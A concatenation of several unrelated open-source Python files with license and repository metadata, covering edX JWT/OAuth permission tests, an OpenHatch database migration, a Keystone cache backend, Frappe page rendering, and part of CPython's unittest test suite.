assert resp.status_code == (status.HTTP_403_FORBIDDEN if is_enforced else status.HTTP_200_OK)
if is_enforced:
self._assert_in_log("JwtHasScope", mock_log.warning)
@patch('edx_rest_framework_extensions.permissions.log')
@ddt.data(*JWT_AUTH_TYPES)
def test_jwt_no_filter(self, auth_type, mock_log):
""" Returns 403 when scopes are enforced with JwtHasContentOrgFilterForRequestedCourse. """
jwt_token = self._create_jwt_token(self.student, auth_type, include_org_filter=False)
resp = self.get_response(AuthType.jwt, token=jwt_token)
is_enforced = auth_type == AuthType.jwt_restricted
assert resp.status_code == (status.HTTP_403_FORBIDDEN if is_enforced else status.HTTP_200_OK)
if is_enforced:
self._assert_in_log("JwtHasContentOrgFilterForRequestedCourse", mock_log.warning)
@ddt.data(*JWT_AUTH_TYPES)
def test_jwt_on_behalf_of_user(self, auth_type):
jwt_token = self._create_jwt_token(self.student, auth_type, include_me_filter=True)
resp = self.get_response(AuthType.jwt, token=jwt_token)
assert resp.status_code == status.HTTP_200_OK
@patch('edx_rest_framework_extensions.permissions.log')
@ddt.data(*JWT_AUTH_TYPES)
def test_jwt_on_behalf_of_other_user(self, auth_type, mock_log):
""" Returns 403 when scopes are enforced with JwtHasUserFilterForRequestedUser. """
jwt_token = self._create_jwt_token(self.other_student, auth_type, include_me_filter=True)
resp = self.get_response(AuthType.jwt, token=jwt_token)
assert resp.status_code == status.HTTP_403_FORBIDDEN
if auth_type == AuthType.jwt_restricted:
self._assert_in_log("JwtHasUserFilterForRequestedUser", mock_log.warning)
else:
self._assert_in_log("IsUserInUrl", mock_log.info)
def test_valid_oauth_token(self):
resp = self.get_response(AuthType.oauth)
assert resp.status_code == status.HTTP_200_OK
def test_invalid_oauth_token(self):
resp = self.get_response(AuthType.oauth, token="fooooooooooToken")
assert resp.status_code == status.HTTP_401_UNAUTHORIZED
def test_expired_oauth_token(self):
token = self._create_oauth_token(self.student)
token.expires = utcnow() - timedelta(weeks=1)
token.save()
resp = self.get_response(AuthType.oauth, token=token)
assert resp.status_code == status.HTTP_401_UNAUTHORIZED
|
agpl-3.0
|
moijes12/oh-mainline
|
mysite/search/migrations/0033_search_lots_of_stuff.py
|
17
|
9315
|
# This file is part of OpenHatch.
# Copyright (C) 2010 OpenHatch, Inc.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from south.db import db
from django.db import models
from mysite.search.models import *
class Migration:
def forwards(self, orm):
# Adding model 'ProjectInvolvementQuestion'
db.create_table('search_projectinvolvementquestion', (
('id', orm['search.projectinvolvementquestion:id']),
('text', orm['search.projectinvolvementquestion:text']),
('project', orm['search.projectinvolvementquestion:project']),
))
db.send_create_signal('search', ['ProjectInvolvementQuestion'])
# Adding model 'Answer'
db.create_table('search_answer', (
('id', orm['search.answer:id']),
('text', orm['search.answer:text']),
('author', orm['search.answer:author']),
('question', orm['search.answer:question']),
))
db.send_create_signal('search', ['Answer'])
# Changing field 'Project.cached_contributor_count'
# (to signature: django.db.models.fields.IntegerField(default=0, null=True))
db.alter_column('search_project', 'cached_contributor_count', orm['search.project:cached_contributor_count'])
def backwards(self, orm):
# Deleting model 'ProjectInvolvementQuestion'
db.delete_table('search_projectinvolvementquestion')
# Deleting model 'Answer'
db.delete_table('search_answer')
# Changing field 'Project.cached_contributor_count'
# (to signature: django.db.models.fields.IntegerField())
db.alter_column('search_project', 'cached_contributor_count', orm['search.project:cached_contributor_count'])
models = {
'auth.group': {
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'blank': 'True'})
},
'auth.permission': {
'Meta': {'unique_together': "(('content_type', 'codename'),)"},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True', 'blank': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'unique_together': "(('app_label', 'model'),)", 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'search.answer': {
'author': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'question': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['search.ProjectInvolvementQuestion']"}),
'text': ('django.db.models.fields.TextField', [], {})
},
'search.bug': {
'bize_size_tag_name': ('django.db.models.fields.CharField', [], {'max_length': '50'}),
'canonical_bug_link': ('django.db.models.fields.URLField', [], {'max_length': '200'}),
'concerns_just_documentation': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'date_reported': ('django.db.models.fields.DateTimeField', [], {}),
'description': ('django.db.models.fields.TextField', [], {}),
'good_for_newcomers': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'importance': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'last_polled': ('django.db.models.fields.DateTimeField', [], {}),
'last_touched': ('django.db.models.fields.DateTimeField', [], {}),
'looks_closed': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'people_involved': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['search.Project']"}),
'status': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'submitter_realname': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True'}),
'submitter_username': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
'search.hitcountcache': {
'hashed_query': ('django.db.models.fields.CharField', [], {'max_length': '40', 'primary_key': 'True'}),
'hit_count': ('django.db.models.fields.IntegerField', [], {})
},
'search.project': {
'cached_contributor_count': ('django.db.models.fields.IntegerField', [], {'default': '0', 'null': 'True'}),
'date_icon_was_fetched_from_ohloh': ('django.db.models.fields.DateTimeField', [], {'default': 'None', 'null': 'True'}),
'icon_for_profile': ('django.db.models.fields.files.ImageField', [], {'default': 'None', 'max_length': '100', 'null': 'True'}),
'icon_for_search_result': ('django.db.models.fields.files.ImageField', [], {'default': 'None', 'max_length': '100', 'null': 'True'}),
'icon_raw': ('django.db.models.fields.files.ImageField', [], {'default': 'None', 'max_length': '100', 'null': 'True'}),
'icon_smaller_for_badge': ('django.db.models.fields.files.ImageField', [], {'default': 'None', 'max_length': '100', 'null': 'True'}),
'icon_url': ('django.db.models.fields.URLField', [], {'max_length': '200'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'language': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'logo_contains_name': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '200'})
},
'search.projectinvolvementquestion': {
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['search.Project']"}),
'text': ('django.db.models.fields.TextField', [], {})
}
}
complete_apps = ['search']
|
agpl-3.0
|
MaheshIBM/keystone
|
keystone/common/kvs/backends/inmemdb.py
|
26
|
1902
|
# Copyright 2013 Metacloud, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Keystone In-Memory Dogpile.cache backend implementation.
"""
import copy
from dogpile.cache import api
NO_VALUE = api.NO_VALUE
class MemoryBackend(api.CacheBackend):
"""A backend that uses a plain dictionary.
There is no size management, and values which are placed into the
dictionary will remain until explicitly removed. Note that Dogpile's
expiration of items is based on timestamps and does not remove them from
the cache.
E.g.::
from dogpile.cache import make_region
region = make_region().configure(
'keystone.common.kvs.Memory'
)
"""
def __init__(self, arguments):
self._db = {}
def _isolate_value(self, value):
if value is not NO_VALUE:
return copy.deepcopy(value)
return value
def get(self, key):
return self._isolate_value(self._db.get(key, NO_VALUE))
def get_multi(self, keys):
return [self.get(key) for key in keys]
def set(self, key, value):
self._db[key] = self._isolate_value(value)
def set_multi(self, mapping):
for key, value in mapping.items():
self.set(key, value)
def delete(self, key):
self._db.pop(key, None)
def delete_multi(self, keys):
for key in keys:
self.delete(key)
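# Illustrative usage (extending the docstring example above): because of the
# deepcopy in _isolate_value, stored values are isolated from later mutation:
#
#   region.set('k', {'a': 1})
#   v = region.get('k')
#   v['a'] = 2           # mutating the returned copy...
#   region.get('k')      # ...still yields {'a': 1}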
|
apache-2.0
|
sbkolate/sap_frappe_v6
|
frappe/website/render.py
|
6
|
6115
|
# Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# MIT License. See license.txt
from __future__ import unicode_literals
import frappe
from frappe import _
import frappe.sessions
from frappe.utils import cstr
import mimetypes, json
from werkzeug.wrappers import Response
from werkzeug.routing import Map, Rule, NotFound
from frappe.website.context import get_context
from frappe.website.utils import get_home_page, can_cache, delete_page_cache
from frappe.website.router import clear_sitemap
from frappe.translate import guess_language
class PageNotFoundError(Exception): pass
def render(path, http_status_code=None):
"""render html page"""
path = resolve_path(path.strip("/ "))
try:
data = render_page_by_language(path)
except frappe.DoesNotExistError, e:
doctype, name = get_doctype_from_path(path)
if doctype and name:
path = "print"
frappe.local.form_dict.doctype = doctype
frappe.local.form_dict.name = name
elif doctype:
path = "list"
frappe.local.form_dict.doctype = doctype
else:
path = "404"
http_status_code = e.http_status_code
try:
data = render_page(path)
except frappe.PermissionError, e:
data, http_status_code = render_403(e, path)
except frappe.Redirect, e:
return build_response(path, "", 301, {
"Location": frappe.flags.redirect_location,
"Cache-Control": "no-store, no-cache, must-revalidate"
})
except Exception:
path = "error"
data = render_page(path)
http_status_code = 500
data = add_csrf_token(data)
return build_response(path, data, http_status_code or 200)
def build_response(path, data, http_status_code, headers=None):
# build response
response = Response()
response.data = set_content_type(response, data, path)
response.status_code = http_status_code
response.headers[b"X-Page-Name"] = path.encode("utf-8")
response.headers[b"X-From-Cache"] = frappe.local.response.from_cache or False
if headers:
for key, val in headers.iteritems():
response.headers[bytes(key)] = val.encode("utf-8")
return response
def render_page_by_language(path):
translated_languages = frappe.get_hooks("translated_languages_for_website")
user_lang = guess_language(translated_languages)
if translated_languages and user_lang in translated_languages:
try:
if path and path != "index":
lang_path = '{0}/{1}'.format(user_lang, path)
else:
lang_path = user_lang # index
return render_page(lang_path)
except frappe.DoesNotExistError:
return render_page(path)
else:
return render_page(path)
def render_page(path):
"""get page html"""
out = None
if can_cache():
# return rendered page
page_cache = frappe.cache().hget("website_page", path)
if page_cache and frappe.local.lang in page_cache:
out = page_cache[frappe.local.lang]
if out:
frappe.local.response.from_cache = True
return out
return build(path)
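# Note on cache shape (illustrative): the "website_page" cache is keyed by path,
# each value being a per-language dict such as
#   {"en": "<html>...</html>", "fr": "<html>...</html>"}
# build_page() below writes the same structure back.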
def build(path):
if not frappe.db:
frappe.connect()
try:
return build_page(path)
except frappe.DoesNotExistError:
hooks = frappe.get_hooks()
if hooks.website_catch_all:
path = hooks.website_catch_all[0]
return build_page(path)
else:
raise
def build_page(path):
if not getattr(frappe.local, "path", None):
frappe.local.path = path
context = get_context(path)
html = frappe.get_template(context.template).render(context)
# html = frappe.get_template(context.base_template_path).render(context)
if can_cache(context.no_cache):
page_cache = frappe.cache().hget("website_page", path) or {}
page_cache[frappe.local.lang] = html
frappe.cache().hset("website_page", path, page_cache)
return html
def resolve_path(path):
if not path:
path = "index"
if path.endswith('.html'):
path = path[:-5]
if path == "index":
path = get_home_page()
frappe.local.path = path
if path != "index":
path = resolve_from_map(path)
return path
def resolve_from_map(path):
m = Map([Rule(r["from_route"], endpoint=r["to_route"], defaults=r.get("defaults"))
for r in frappe.get_hooks("website_route_rules")])
urls = m.bind_to_environ(frappe.local.request.environ)
try:
endpoint, args = urls.match("/" + path)
path = endpoint
if args:
# don't cache when there's a query string!
frappe.local.no_cache = 1
frappe.local.form_dict.update(args)
except NotFound:
pass
return path
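# For illustration, a (hypothetical) hook entry consumed above could be:
#   website_route_rules = [
#       {"from_route": "/orders/<name>", "to_route": "order"},
#   ]
# so a request to /orders/ORD-0001 resolves to the "order" page with
# frappe.local.form_dict.name == "ORD-0001" and caching disabled.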
def set_content_type(response, data, path):
if isinstance(data, dict):
response.headers[b"Content-Type"] = b"application/json; charset: utf-8"
data = json.dumps(data)
return data
response.headers[b"Content-Type"] = b"text/html; charset: utf-8"
if "." in path:
content_type, encoding = mimetypes.guess_type(path)
if not content_type:
content_type = "text/html; charset: utf-8"
response.headers[b"Content-Type"] = content_type.encode("utf-8")
return data
def clear_cache(path=None):
frappe.cache().delete_value("website_generator_routes")
delete_page_cache(path)
if not path:
clear_sitemap()
frappe.clear_cache("Guest")
frappe.cache().delete_value("_website_pages")
frappe.cache().delete_value("home_page")
for method in frappe.get_hooks("website_clear_cache"):
frappe.get_attr(method)(path)
def render_403(e, pathname):
path = "message"
frappe.local.message = """<p><strong>{error}</strong></p>
<p>
<a href="/login?redirect-to=/{pathname}" class="btn btn-primary">{login}</a>
</p>""".format(error=cstr(e.message), login=_("Login"), pathname=frappe.local.path)
frappe.local.message_title = _("Not Permitted")
return render_page(path), e.http_status_code
def get_doctype_from_path(path):
doctypes = frappe.db.sql_list("select name from tabDocType")
parts = path.split("/")
doctype = parts[0]
name = parts[1] if len(parts) > 1 else None
if doctype in doctypes:
return doctype, name
# try scrubbed
doctype = doctype.replace("_", " ").title()
if doctype in doctypes:
return doctype, name
return None, None
def add_csrf_token(data):
return data.replace("<!-- csrf_token -->", '<script>frappe.csrf_token = "{0}";</script>'.format(
frappe.local.session.data.csrf_token))
|
mit
|
moto-timo/ironpython3
|
Src/StdLib/Lib/unittest/test/test_case.py
|
4
|
64196
|
import contextlib
import difflib
import pprint
import pickle
import re
import sys
import logging
import warnings
import weakref
import inspect
from copy import deepcopy
from test import support
import unittest
from unittest.test.support import (
TestEquality, TestHashing, LoggingResult, LegacyLoggingResult,
ResultWithNoStartTestRunStopTestRun
)
from test.support import captured_stderr
log_foo = logging.getLogger('foo')
log_foobar = logging.getLogger('foo.bar')
log_quux = logging.getLogger('quux')
class Test(object):
"Keep these TestCase classes out of the main namespace"
class Foo(unittest.TestCase):
def runTest(self): pass
def test1(self): pass
class Bar(Foo):
def test2(self): pass
class LoggingTestCase(unittest.TestCase):
"""A test case which logs its calls."""
def __init__(self, events):
super(Test.LoggingTestCase, self).__init__('test')
self.events = events
def setUp(self):
self.events.append('setUp')
def test(self):
self.events.append('test')
def tearDown(self):
self.events.append('tearDown')
class Test_TestCase(unittest.TestCase, TestEquality, TestHashing):
### Set up attributes used by inherited tests
################################################################
# Used by TestHashing.test_hash and TestEquality.test_eq
eq_pairs = [(Test.Foo('test1'), Test.Foo('test1'))]
# Used by TestEquality.test_ne
ne_pairs = [(Test.Foo('test1'), Test.Foo('runTest')),
(Test.Foo('test1'), Test.Bar('test1')),
(Test.Foo('test1'), Test.Bar('test2'))]
################################################################
### /Set up attributes used by inherited tests
# "class TestCase([methodName])"
# ...
# "Each instance of TestCase will run a single test method: the
# method named methodName."
# ...
# "methodName defaults to "runTest"."
#
# Make sure it really is optional, and that it defaults to the proper
# thing.
def test_init__no_test_name(self):
class Test(unittest.TestCase):
def runTest(self): raise MyException()
def test(self): pass
self.assertEqual(Test().id()[-13:], '.Test.runTest')
# test that TestCase can be instantiated with no args
# primarily for use at the interactive interpreter
test = unittest.TestCase()
test.assertEqual(3, 3)
with test.assertRaises(test.failureException):
test.assertEqual(3, 2)
with self.assertRaises(AttributeError):
test.run()
# "class TestCase([methodName])"
# ...
# "Each instance of TestCase will run a single test method: the
# method named methodName."
def test_init__test_name__valid(self):
class Test(unittest.TestCase):
def runTest(self): raise MyException()
def test(self): pass
self.assertEqual(Test('test').id()[-10:], '.Test.test')
# "class TestCase([methodName])"
# ...
# "Each instance of TestCase will run a single test method: the
# method named methodName."
def test_init__test_name__invalid(self):
class Test(unittest.TestCase):
def runTest(self): raise MyException()
def test(self): pass
try:
Test('testfoo')
except ValueError:
pass
else:
self.fail("Failed to raise ValueError")
# "Return the number of tests represented by the this test object. For
# TestCase instances, this will always be 1"
def test_countTestCases(self):
class Foo(unittest.TestCase):
def test(self): pass
self.assertEqual(Foo('test').countTestCases(), 1)
# "Return the default type of test result object to be used to run this
# test. For TestCase instances, this will always be
# unittest.TestResult; subclasses of TestCase should
# override this as necessary."
def test_defaultTestResult(self):
class Foo(unittest.TestCase):
def runTest(self):
pass
result = Foo().defaultTestResult()
self.assertEqual(type(result), unittest.TestResult)
# "When a setUp() method is defined, the test runner will run that method
# prior to each test. Likewise, if a tearDown() method is defined, the
# test runner will invoke that method after each test. In the example,
# setUp() was used to create a fresh sequence for each test."
#
# Make sure the proper call order is maintained, even if setUp() raises
# an exception.
def test_run_call_order__error_in_setUp(self):
events = []
result = LoggingResult(events)
class Foo(Test.LoggingTestCase):
def setUp(self):
super(Foo, self).setUp()
raise RuntimeError('raised by Foo.setUp')
Foo(events).run(result)
expected = ['startTest', 'setUp', 'addError', 'stopTest']
self.assertEqual(events, expected)
# "With a temporary result stopTestRun is called when setUp errors.
def test_run_call_order__error_in_setUp_default_result(self):
events = []
class Foo(Test.LoggingTestCase):
def defaultTestResult(self):
return LoggingResult(self.events)
def setUp(self):
super(Foo, self).setUp()
raise RuntimeError('raised by Foo.setUp')
Foo(events).run()
expected = ['startTestRun', 'startTest', 'setUp', 'addError',
'stopTest', 'stopTestRun']
self.assertEqual(events, expected)
# "When a setUp() method is defined, the test runner will run that method
# prior to each test. Likewise, if a tearDown() method is defined, the
# test runner will invoke that method after each test. In the example,
# setUp() was used to create a fresh sequence for each test."
#
# Make sure the proper call order is maintained, even if the test raises
# an error (as opposed to a failure).
def test_run_call_order__error_in_test(self):
events = []
result = LoggingResult(events)
class Foo(Test.LoggingTestCase):
def test(self):
super(Foo, self).test()
raise RuntimeError('raised by Foo.test')
expected = ['startTest', 'setUp', 'test', 'tearDown',
'addError', 'stopTest']
Foo(events).run(result)
self.assertEqual(events, expected)
# "With a default result, an error in the test still results in stopTestRun
# being called."
def test_run_call_order__error_in_test_default_result(self):
events = []
class Foo(Test.LoggingTestCase):
def defaultTestResult(self):
return LoggingResult(self.events)
def test(self):
super(Foo, self).test()
raise RuntimeError('raised by Foo.test')
expected = ['startTestRun', 'startTest', 'setUp', 'test',
'tearDown', 'addError', 'stopTest', 'stopTestRun']
Foo(events).run()
self.assertEqual(events, expected)
# "When a setUp() method is defined, the test runner will run that method
# prior to each test. Likewise, if a tearDown() method is defined, the
# test runner will invoke that method after each test. In the example,
# setUp() was used to create a fresh sequence for each test."
#
# Make sure the proper call order is maintained, even if the test signals
# a failure (as opposed to an error).
def test_run_call_order__failure_in_test(self):
events = []
result = LoggingResult(events)
class Foo(Test.LoggingTestCase):
def test(self):
super(Foo, self).test()
self.fail('raised by Foo.test')
expected = ['startTest', 'setUp', 'test', 'tearDown',
'addFailure', 'stopTest']
Foo(events).run(result)
self.assertEqual(events, expected)
# "When a test fails with a default result stopTestRun is still called."
def test_run_call_order__failure_in_test_default_result(self):
class Foo(Test.LoggingTestCase):
def defaultTestResult(self):
return LoggingResult(self.events)
def test(self):
super(Foo, self).test()
self.fail('raised by Foo.test')
expected = ['startTestRun', 'startTest', 'setUp', 'test',
'tearDown', 'addFailure', 'stopTest', 'stopTestRun']
events = []
Foo(events).run()
self.assertEqual(events, expected)
# "When a setUp() method is defined, the test runner will run that method
# prior to each test. Likewise, if a tearDown() method is defined, the
# test runner will invoke that method after each test. In the example,
# setUp() was used to create a fresh sequence for each test."
#
# Make sure the proper call order is maintained, even if tearDown() raises
# an exception.
def test_run_call_order__error_in_tearDown(self):
events = []
result = LoggingResult(events)
class Foo(Test.LoggingTestCase):
def tearDown(self):
super(Foo, self).tearDown()
raise RuntimeError('raised by Foo.tearDown')
Foo(events).run(result)
expected = ['startTest', 'setUp', 'test', 'tearDown', 'addError',
'stopTest']
self.assertEqual(events, expected)
# "When tearDown errors with a default result stopTestRun is still called."
def test_run_call_order__error_in_tearDown_default_result(self):
class Foo(Test.LoggingTestCase):
def defaultTestResult(self):
return LoggingResult(self.events)
def tearDown(self):
super(Foo, self).tearDown()
raise RuntimeError('raised by Foo.tearDown')
events = []
Foo(events).run()
expected = ['startTestRun', 'startTest', 'setUp', 'test', 'tearDown',
'addError', 'stopTest', 'stopTestRun']
self.assertEqual(events, expected)
# "TestCase.run() still works when the defaultTestResult is a TestResult
# that does not support startTestRun and stopTestRun."
def test_run_call_order_default_result(self):
class Foo(unittest.TestCase):
def defaultTestResult(self):
return ResultWithNoStartTestRunStopTestRun()
def test(self):
pass
Foo('test').run()
def _check_call_order__subtests(self, result, events, expected_events):
class Foo(Test.LoggingTestCase):
def test(self):
super(Foo, self).test()
for i in [1, 2, 3]:
with self.subTest(i=i):
if i == 1:
self.fail('failure')
for j in [2, 3]:
with self.subTest(j=j):
if i * j == 6:
raise RuntimeError('raised by Foo.test')
1 / 0
# Order is the following:
# i=1 => subtest failure
# i=2, j=2 => subtest success
# i=2, j=3 => subtest error
# i=3, j=2 => subtest error
# i=3, j=3 => subtest success
# toplevel => error
Foo(events).run(result)
self.assertEqual(events, expected_events)
def test_run_call_order__subtests(self):
events = []
result = LoggingResult(events)
expected = ['startTest', 'setUp', 'test', 'tearDown',
'addSubTestFailure', 'addSubTestSuccess',
'addSubTestFailure', 'addSubTestFailure',
'addSubTestSuccess', 'addError', 'stopTest']
self._check_call_order__subtests(result, events, expected)
def test_run_call_order__subtests_legacy(self):
# With a legacy result object (without an addSubTest method),
# test execution stops after the first subtest failure.
events = []
result = LegacyLoggingResult(events)
expected = ['startTest', 'setUp', 'test', 'tearDown',
'addFailure', 'stopTest']
self._check_call_order__subtests(result, events, expected)
def _check_call_order__subtests_success(self, result, events, expected_events):
class Foo(Test.LoggingTestCase):
def test(self):
super(Foo, self).test()
for i in [1, 2]:
with self.subTest(i=i):
for j in [2, 3]:
with self.subTest(j=j):
pass
Foo(events).run(result)
self.assertEqual(events, expected_events)
def test_run_call_order__subtests_success(self):
events = []
result = LoggingResult(events)
# The 6 subtest successes are individually recorded, in addition
# to the whole test success.
expected = (['startTest', 'setUp', 'test', 'tearDown']
+ 6 * ['addSubTestSuccess']
+ ['addSuccess', 'stopTest'])
self._check_call_order__subtests_success(result, events, expected)
def test_run_call_order__subtests_success_legacy(self):
# With a legacy result, only the whole test success is recorded.
events = []
result = LegacyLoggingResult(events)
expected = ['startTest', 'setUp', 'test', 'tearDown',
'addSuccess', 'stopTest']
self._check_call_order__subtests_success(result, events, expected)
def test_run_call_order__subtests_failfast(self):
events = []
result = LoggingResult(events)
result.failfast = True
class Foo(Test.LoggingTestCase):
def test(self):
super(Foo, self).test()
with self.subTest(i=1):
self.fail('failure')
with self.subTest(i=2):
self.fail('failure')
self.fail('failure')
expected = ['startTest', 'setUp', 'test', 'tearDown',
'addSubTestFailure', 'stopTest']
Foo(events).run(result)
self.assertEqual(events, expected)
def test_subtests_failfast(self):
# Ensure proper test flow with subtests and failfast (issue #22894)
events = []
class Foo(unittest.TestCase):
def test_a(self):
with self.subTest():
events.append('a1')
events.append('a2')
def test_b(self):
with self.subTest():
events.append('b1')
with self.subTest():
self.fail('failure')
events.append('b2')
def test_c(self):
events.append('c')
result = unittest.TestResult()
result.failfast = True
suite = unittest.makeSuite(Foo)
suite.run(result)
expected = ['a1', 'a2', 'b1']
self.assertEqual(events, expected)
# "This class attribute gives the exception raised by the test() method.
# If a test framework needs to use a specialized exception, possibly to
# carry additional information, it must subclass this exception in
# order to ``play fair'' with the framework. The initial value of this
# attribute is AssertionError"
def test_failureException__default(self):
class Foo(unittest.TestCase):
def test(self):
pass
self.assertIs(Foo('test').failureException, AssertionError)
# "This class attribute gives the exception raised by the test() method.
# If a test framework needs to use a specialized exception, possibly to
# carry additional information, it must subclass this exception in
# order to ``play fair'' with the framework."
#
# Make sure TestCase.run() respects the designated failureException
def test_failureException__subclassing__explicit_raise(self):
events = []
result = LoggingResult(events)
class Foo(unittest.TestCase):
def test(self):
raise RuntimeError()
failureException = RuntimeError
self.assertIs(Foo('test').failureException, RuntimeError)
Foo('test').run(result)
expected = ['startTest', 'addFailure', 'stopTest']
self.assertEqual(events, expected)
# "This class attribute gives the exception raised by the test() method.
# If a test framework needs to use a specialized exception, possibly to
# carry additional information, it must subclass this exception in
# order to ``play fair'' with the framework."
#
# Make sure TestCase.run() respects the designated failureException
def test_failureException__subclassing__implicit_raise(self):
events = []
result = LoggingResult(events)
class Foo(unittest.TestCase):
def test(self):
self.fail("foo")
failureException = RuntimeError
self.assertIs(Foo('test').failureException, RuntimeError)
Foo('test').run(result)
expected = ['startTest', 'addFailure', 'stopTest']
self.assertEqual(events, expected)
# "The default implementation does nothing."
def test_setUp(self):
class Foo(unittest.TestCase):
def runTest(self):
pass
# ... and nothing should happen
Foo().setUp()
# "The default implementation does nothing."
def test_tearDown(self):
class Foo(unittest.TestCase):
def runTest(self):
pass
# ... and nothing should happen
Foo().tearDown()
# "Return a string identifying the specific test case."
#
# Because of the vague nature of the docs, I'm not going to lock this
# test down too much. Really all that can be asserted is that the id()
# will be a string (either 8-bit or unicode -- again, because the docs
# just say "string")
def test_id(self):
class Foo(unittest.TestCase):
def runTest(self):
pass
self.assertIsInstance(Foo().id(), str)
# "If result is omitted or None, a temporary result object is created,
# used, and is made available to the caller. As TestCase owns the
# temporary result, startTestRun and stopTestRun are called."
def test_run__uses_defaultTestResult(self):
events = []
defaultResult = LoggingResult(events)
class Foo(unittest.TestCase):
def test(self):
events.append('test')
def defaultTestResult(self):
return defaultResult
# Make run() find a result object on its own
result = Foo('test').run()
self.assertIs(result, defaultResult)
expected = ['startTestRun', 'startTest', 'test', 'addSuccess',
'stopTest', 'stopTestRun']
self.assertEqual(events, expected)
# "The result object is returned to run's caller"
def test_run__returns_given_result(self):
class Foo(unittest.TestCase):
def test(self):
pass
result = unittest.TestResult()
retval = Foo('test').run(result)
self.assertIs(retval, result)
# "The same effect [as method run] may be had by simply calling the
# TestCase instance."
def test_call__invoking_an_instance_delegates_to_run(self):
resultIn = unittest.TestResult()
resultOut = unittest.TestResult()
class Foo(unittest.TestCase):
def test(self):
pass
def run(self, result):
self.assertIs(result, resultIn)
return resultOut
retval = Foo('test')(resultIn)
self.assertIs(retval, resultOut)
def testShortDescriptionWithoutDocstring(self):
self.assertIsNone(self.shortDescription())
@unittest.skipIf(sys.flags.optimize >= 2,
"Docstrings are omitted with -O2 and above")
def testShortDescriptionWithOneLineDocstring(self):
"""Tests shortDescription() for a method with a docstring."""
self.assertEqual(
self.shortDescription(),
'Tests shortDescription() for a method with a docstring.')
@unittest.skipIf(sys.flags.optimize >= 2,
"Docstrings are omitted with -O2 and above")
def testShortDescriptionWithMultiLineDocstring(self):
"""Tests shortDescription() for a method with a longer docstring.
This method ensures that only the first line of a docstring is
used in the short description, no matter how long the whole thing
is.
"""
self.assertEqual(
self.shortDescription(),
'Tests shortDescription() for a method with a longer '
'docstring.')
def testAddTypeEqualityFunc(self):
class SadSnake(object):
"""Dummy class for test_addTypeEqualityFunc."""
s1, s2 = SadSnake(), SadSnake()
self.assertFalse(s1 == s2)
def AllSnakesCreatedEqual(a, b, msg=None):
return type(a) == type(b) == SadSnake
self.addTypeEqualityFunc(SadSnake, AllSnakesCreatedEqual)
self.assertEqual(s1, s2)
# No, this doesn't clean up and remove the SadSnake equality func
